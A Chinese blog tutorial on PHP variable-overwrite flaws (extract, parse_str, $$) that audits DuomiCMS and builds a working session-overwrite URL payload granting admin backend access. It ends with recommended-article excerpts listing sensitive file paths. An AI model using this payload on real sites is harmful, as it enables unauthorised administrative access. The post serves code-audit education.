$_session无法存储变量怎么回事_代码审计去理解变量覆盖漏洞

最新推荐文章于 2022-12-14 17:15:34 发布
最新推荐文章于 2022-12-14 17:15:34 发布
阅读量114 收藏
点赞数 1
文章标签: $_session无法存储变量怎么回事
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39878549/article/details/112079816
版权

前言:

这篇文章是我在 前几个月写的,然后如今才打算发布的,咳咳,也没啥可以写的,就写一下变量覆盖的形成,如何代码审计查找白盒专属的变量覆盖漏洞

变量覆盖是有啥用处?

变量覆盖可以使用我们自定义的变量去覆盖 源代码中的变量,去修改代码运行的逻辑。变量覆盖与其他漏洞结合后 伤害是比较大的,比如商品购买的支付系统如果存在变量覆盖的话可能出现0元支付下单的情况,或者说 登录管理员后台的时候,通过变量覆盖,进行登录后台(这篇文章讲解的就是 duomicms的变量覆盖进入后台,小白也很容易懂)

正文

变量覆盖产生原因引发变量覆盖漏洞函数:

  1. extract()

  2. parse_str()

  3. Import_request_variables()

  4. $$(双美元符)

  5. Register_globals=On (PHP 5.4之后移除)

0x01. extract() 函数

这时候看一下菜鸟教程是怎么使用的

4dfb1b52f1ad1f2fbcf4ef71f1aabb15.png

看下语法是 extract(array,value1,value2)我们发现第一个参数是必选值,然后就不必说了

这时候我们发现,其实关键的是第二个参数值

EXTR_OVERWRITE - 默认。如果有冲突,则覆盖已有的变量。

并且发现这里是默认的,这时候就稳妥了,这就导致可以变量覆盖了

php$user = 'user';echo "欢迎用户 $user !
";$admin = array('user' => 'admin');extract($admin);echo "欢迎管理员 $user ";?>

看下这个代码逻辑,变量user 等于 字符串user然后输出这个变量 user之后我们再定义一个变量admin然后就是定义数组,键为 字符串 user,值为admin然后通过extract() 这个函数,里面就是数组

 array(‘user’ => ‘admin’)

然后是默认 EXTR_OVERWRITE 这个参数,这时候发现键名和上面的变量名重复于是就会覆盖掉原本那个 user

716180c6ffe2002c774e50757ba575e6.png

0x02.parse_str()函数

老规矩,看下是怎么解释的,这里说,如果没有设置array参数那么函数设置的变量将会覆盖已经存在的 同名变量

fa67a1aa64c604662d82b5d345d42da4.png

然后我们看下面这个 array这个参数规定存储变量的数组的名称。该参数指示变量将被存储到数组中所以也就是说,我们只要没有array这个参数,就会导致变量覆盖这个漏洞

php$username = 'user';print_r('执行函数覆盖之前:$username ='.$username."
");// 执行函数 parse_str() ,然后里面没有数组成功覆盖parse_str("username=admin");print_r('执行函数覆盖之后:$username ='.$username);?>

0ac45195b8ca46f91157b405744c7a11.png

0x03. import_request_variables()函数

5588407f48218711e1d095d620e00cde.png

这里我们简单的看下type参数就行,其实这里就是说P = post   g = get  c = cookie然后就可以理解了,从左到右的顺序这些顺序就是优先级,也就是说 gpc,意思就是说,get传参会覆盖 post传参,而post传参,则覆盖cookie传参,同理可得:get传参也可以覆盖cookie

8180f8301491fcb63c9fbb277010e7dc.png

差不多就是这个意思了

0x04. $$双美元符导致的变量覆盖

php$a = 'b';$b= 'admin';echo $$a;?>

ba77955c794f4d5e618f6207c7b61204.png

这里源码我写的比较粗糙,哥哥们看的懂就行输出的结果为 admin,而接下来讲的就是$$导致的变量覆盖

0x05.实战讲解

0c125d48d9ab1514bc041b63dd830796.png

先安装好这个cms,然后再审计

漏洞地址在 upload/duomiphp/common.php

d707d00cb81e2de26d12d18d71f6061c.png

我们直接进入我们的$$符查找

4f4276157505dd73db91d010d3e5a89f.png

0de5a0b89939432d3f1a70b8dd123ef4.png

这在我的博客上面也有提到过,键值分离 点击跳转博客

849c4e885557bd80818b6ea496a400c3.png

先把其他的注释掉,然后我们看下 $request 是个什么鬼

48721892419725134fbb98f107157dc6.png

其实就是把array('GET','POST','COOKIE')中的值遍历出来,其实就可以等价于

php$arr = array('_GET','_POST','_COOKIE');foreach($arr as $_request){    echo $_request."
";}?>

这时候我们知道第一层的 foreach是 输出 GET,POST,_COOKIE

php $arr = array('_GET','_POST','_COOKIE');foreach($arr as $_request){    foreach($$_request as $_k => $_v){        echo $_k.'=>'.$_v."
";    }}?>

那我们就看第二层foreach是个什么梗

$request 其实就等于  _GET,POST,_COOKIE

而$$request 就等于 $_GET,$_POST,$_COOKIE

但是这里的第二层foreach() 其实就是键值分离,而我们可以看下

24bb2cfd5658a88ae528c52710379533.png

其实简单来说这3个地方可以被我们控制

d7152261d7ca451516520f3117f22983.png

注意看,因为我们这边是 只使用一个函数,所以我们函数也给复制过来,然后我们在输出一下,发现就跟我们前面写的一模一样但是我们可以看到的执行顺序是  GET > POST > COOKIE

eb660c3fb329d1b49f8bb99f422756c8.png

这时候我们可以进行覆盖,我们再去看一下如何才能进入这一步

5b4d65a165cf180150f35b750303ef95.png

我们发现上面没有exit(),die()就忽略了

然后我们看到了那个注释下面那边有个 exit() 这时候我们不能让它进入,不然就无法执行上面讲述的代码了

phpforeach($_REQUEST as $_k=>$_v){    if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )    {        exit('Request var not allow!');    }}?>

我们不能让这个if条件成立 && 其实就是跟  and一样,当着 3个条件满足,才会exit我们就让其中一个不满足

第一个条件:$k就是键,我们必须要满足,我们看下面那个图,如果我们没有键的话,根本无法控制利用

7bf13dad18c999502569bf4d56d34ee5.png

第二个条件:这其实就是一个正则(这是用户自定义的,就不纠结了),然后正则里面能不能有cfg和 GLOBALS

第三个条件:isset判断是否存在,如果是,则为 true,但是前面有个 感叹号这时候意思相反  如果是则为 flase,如果否,则为 true,不能有cookie某个值传参

然后我们只需要满足其中一个条件,就不会进入exit了

然后变量覆盖只能覆盖上面的代码

b29b5c137e667aaee4bff21e54de8cd6.png

如果下面的代码再次定义的话,我们覆盖也没什么用的然后注意,这是在 common.php这个文件其实就是通用文件,里面定义的东西全局可能 也会调用等等这时候就去查找一下哪个文件包含了这个common.php其实我们只要找到有危害的地方就行了,像其他地方,有危害即使调用了也没有卵用

7c66c34683f110c23c9cb61f5f15b8c7.png

然后这时候我们发现login.php 包含了 common.php这时候我们有看到了下面又调用了一个 check.admin.php了英语会点的就知道,意思就是检查 是否为admin的意思这时候我们发现找不到这个文件,duomi_INC 在哪里

24907131e8b6ebb90a8024d775e0ba8b.png

这时候我们可以去打开login.php

f86d587a3ec94c04ab6f2134be40bc81.png

然后进行简单的修改一下Exit(duomi_INC);这时候就爆出路径

9a190208220eb6f191818d87989579d8.png

然后再去寻找一下路径

5910debd5ee66fbf475b62a57b15736f.png

成功的在duomiphp下面找到了check.admin.php因为这边用了session_start 才能对其进行覆盖登陆后台

d171221a09ff33408dd32b8a107ff4e1.png

然后我们全局搜索找到这个session_start(),在这个 /interface/comment.php 路径下

这时候我们再去寻找那个check.admin.php进行构造session,进入后台

Userlogin 顾名思义,就是用户登陆,而session需要有

duomi_admin_id

duomi_group_id

duomi_admin_name

php//获得用户的权限值    function getgroupid()    {        if($this->groupid!='')        {            return $this->groupid;        }        else        {            return -1;        }    }    function getUserRank()    {        return $this->getgroupid();    }
//获得用户的ID
    function getUserID()
    {
        if($this->userID!='')
        {
            return $this->userID;
        }
        else
        {
            return -1;
        }
    }
 //获得用户名
    function getUserName()
    {
        if($this->userName!='')
        {
            return $this->userName;
        }
        else
        {
            return -1;
        }
    }
}
?>

首先是获取用户权限

3bcde61dbf638e629c1c983dd605f7a6.png

这时候我们发现当 groupid=1的时候是系统管理员,我们这就开始构造payload

覆盖session首先得strat,也就是要开启session_strat一下

我们看上面写了interface/comment.php然后我们可以在get传参里面传入session

24d5130d059b0cd2098ec906d2033253.png

注意看,键值这边的话是$$符,所以我们不用再加$然后需要有3个session,第一个是用户权限

interface/comment.php?_SESSION[duomi_group_id]=1

看上面源码,获取的顺序,第二个,userid我们不知道,这也没固定,那就乱写个 1

(其实这里只要权限写对,其他随便写,因为这边只对权限进行判断,没有对用户id和用户名进行判断)

interface/comment.php?_SESSIOmi_group_id]=1&_SESSION['duomi_admin_id']=1

还剩一个用户名

interface/comment.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin

就成功构建好了,把我脑瓜子都整的嗡嗡叫了,我语文是真的不好啊

bb8464a7e9d6e7f5c5b99aa4c198d112.png

这里提示我们要登录,这时候我们传参进去

87acd73c9e825ed24cbe0f153d0c444d.png

这时候去访问admin页面发现成功访问了,因为session是存储在服务端,然后会持续会话,我们传参进去报错,但是session已经存储到了服务端,这时候访问admin,就可以进去了

bf575c223dbad2baceefaafda8071245.png

weixin_39878549
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
九、漏洞挖掘与代码审计(2)变量覆盖漏洞
weixin_45540609的博客
05-18 357
一、变量覆盖 用我们的传参值替换程序原有的变量值。 1、常见场景 (1)$$使用不当 (2)extract()函数使用不当 (3)parse_str()函数使用不当 (4)import_request_variables()使用不当 2、函数解析 (1)extract() 将数组中变量导入当前符号表中。把数组中键和值分开,键是变量名,值是变量值。 (2)parse_str() 将查询字符串解析到变量中 (3)$$ $a =1; $b =2; echo $$a; .
razor 怎样使用session变量_session浅析(前端方向)
weixin_39800957的博客
11-19 483
【摘要】任何一个从事前端的开发者,都必须要对cookie和session有充分的了解,为什么session在前端开发中显得尤为重要?而众多的初级开发者似乎并不太了解他们。今天就给大家详细解读一下session的机制。让大家有个充分的了解。【作者】xing xingsession浅析什么是session Session:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对...
razor 怎样使用session变量_session文件包含漏洞
weixin_39777404的博客
11-19 126
文件包含漏洞是由于函数加载的参数没有经过严格的过滤或者限制,可以被用户控制,包含恶意文件,从而达到getshell。常见的敏感信息路径:Windows系统的敏感信息路径:c:boot.ini // 查看系统版本c:windowsrepairsam // 存储Windows系统初次安装的密码c:ProgramFilesmysqlmy.ini // MySQL配置c:ProgramFi...
session文件包含漏洞详解
永远是少年
12-14 1567
今天继续给大家介绍渗透测试相关知识,本文主要内容是session文件包含漏洞详解。 一、session文件包含简介 二、session文件包含实战
Duomicms变量覆盖
yqdid的博客
04-20 353
Duomicms变量覆盖漏洞 由于是第一次搞这个 ,不是很懂。。 所以 思路是参考这位博主的 https://www.cnblogs.com/Qiuzhiyu/p/11923471.html 首先去了解一下 变量覆盖漏洞的原理: 变量覆盖漏洞是指可以用我们自定义的参数值替换程序原有的变量值,从而产生漏洞。大多都是由于函数使用不当导致,经常导致变量覆盖漏洞的函数有:extract()函数、pars...
web安全入门(第九章-2)变量覆盖
Yzz_的博客
06-07 365
一、什么是变量覆盖 0,代码审计方式 黑盒审计: 没有源代码,直接去测试 白盒审计: 给你源代码,给你去测试 灰盒审计: 有源代码,先用黑盒测试去,有问题在回头看源代码 从某种角度说,脚本小子与内行渗透人员的主要区别就在于: 是否可以进行白盒审计或者说是否会向这个方向思考(能不能看懂代码) 1,定义 指的是可以用我们的传参值替换程序原有的变量值 例如: <?php $a = 1; $a = fg; //在这就完成了覆盖,是不是很简单
php变量值随机,PHP $ _SESSION变量随机被覆盖
weixin_39550937的博客
03-11 99
好的,当我运行这个脚本从论坛帖子中删除用户的评论时,$ _SESSION ['id'](用户的mysql id)变为$ postid(论坛帖子的ID)。我没有调用任何函数来设置它,并且在会话初始化时调用了session_write_close();。session_start();// I'm not showing connection code.if(isset($_SESSION['user...
文件包含漏洞
weixin_61143354的博客
07-16 1051
网安-web安全
PHP空间出现session无法保存问题解决办法
Lankecms
01-07 3242
PHP空间出现session无法保存问题解决办法 今天突然发现,一个运行9个月的PHP万网Linux空间出现验证码无法通过,会员无法登陆,后台也无法登陆的问题,因为这几个功能一直运行很好,而且服务器也是国内最好的万网,页面访问很正常,所以感到非常的奇怪。     经过方维技术部检测,是session无法保存的问题,显示错误语句是session_start();    详细错误信
PHP session 失效不传递的解决办法
成长的痕迹
04-23 1999
PHP中,session不能传递到下一个页面去,一般有两种情况: 我们先写个php文件:, 传到服务器去看看服务器的参数配置。 转到session部分,看到session.use_trans_sid参数被设为了零。 这个参数指定了是否启用透明SID支持,即session是否随着URL传递。我个人的理解是,一旦这个参数被设为0,那么每个URL都会启一个session。这样后面页面就无法追踪得到
服务器无法保存SESSION解决方案
热门推荐
flydycfly的专栏
02-29 1万+
网站一直运行很好,今天突然后台无法登录,提示session无法保存,在网上找了很多方法一直没有圆满解决这个问题,测试了很久,最终找到了解决方法。 问题:Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is corr
关于Ajax跨域访问 session不能保存或之后无法访问session取值为空等问题
https://syra-ti.icu
09-27 4878
根据浏览器的保护规则,跨域的时候我们创建的sessionId是不会被浏览器保存下来的,这样,当我们在进行跨域访问的时候,我们的sessionId就不会被保存下来,也就是说,每一次的请求,服务器就会以为是一个新的人,而不是同一个人,为了解决这样的办法,下面这种方法可以解决这种跨域的办法。
SESSION变量覆盖导致SQL注入漏洞
qq_31763129的博客
05-09 1422
include/common.inc.php文件,搜索(大概在68行的样子)   if( strlen($svar)&gt;0 &amp;&amp; preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )      修改为      if( strlen($svar)&gt;0 &amp;&amp; preg_match('#^(cfg...
php之变量覆盖漏洞讲解
weixin_34212189的博客
11-10 371
1.变量没有初始化的问题(1):wooyun连接1:[link href="WooYun: PHPCMS V9 member表内容随意修改漏洞"]tenzy[/link] $updateinfo['password'] = $newpassword;里面的数组没有初始化类似这样的赋值,我们在挖洞的时候搜索类似updateinfo这样的关键字看看 是否初始化,如果没有。。。且register_glo...
SessionID漏洞
CH3UHX9
02-28 1583
漏洞原理 当用户第一次访问服务程序时,服务器端会给用户创建一个独立的会话Session 并且生成一个SessionID。 SessionID在响应浏览器的时候会被加载到cookie中,并保存到浏览器中。 当用户再一次访问服务程序时,请求中会携带着cookie中的SessionID去访问服务器。 服务器会根据这个SessionID去查看是否有对应的Session对象,有则使用,没有就新创建一个Session漏洞介绍 如果SessionID的构造原理太简单,就很容易被别人仿造。 仿造了Session
WEB项目SESSIONID固定漏洞
一瓶绿茶三元钱
02-15 6480
问题场景 访问一个WEB页面,会看到有一个JSESSIONID,这是由服务器端在会话开始是通过set-cookie来设置的匿名SessionId 在登录进入后,再次查看SESSIONID,会发现此值未发生改变,这样,就产生了SESSIONID固定漏洞 攻击步骤 第一步,需要获取被攻击用户的JSESSIONID,可以通过给被攻击用户一个伪造的JSESS
PHP漏洞全解(七)-Session劫持
zacklin的专栏
04-16 1536
服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提
PHP所有版本 SESSION 漏洞
Alex的专栏
08-28 1381
关键字:php 漏洞 session register_globals 登录 安全先看这一段简单的代码session_start();$_SESSION[isadmin]=yes;$isadmin=no;echo $_SESSION[isadmin];?>当php.ini里配置 register_globals = Off 时,没任何问题,输出 yes但是当php.ini里配置 r
固定SessionID漏洞
阿里巴巴B2B诚信开发部
12-13 1367
  by BoBo   一个简单的登录控制 下面是一个最常用最简单的登录控制流程,通过表单提交用户名密码,servlet判断用户名密码,正确则写一个session,然后跳转到登录后的能够看到的页面登录页面JSP /*省略头部信息*/ &lt;body&gt; &lt;form action="SessionTestServlet" method="post"&gt; 用户...
$GLOBALS $_SERVER $_REQUEST $_POST $_GET $_FILES $_ENV $_COOKIE $_SESSION
最新发布
05-26
这是PHP中预定义的全局变量,用于获取不同类型的HTTP请求和服务器环境信息。 - $GLOBALS: 包含了全部变量的全局数组,可以在函数或方法中引用全局变量。...- $_SESSION: 用于存储当前会话的信息,如登录状态等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值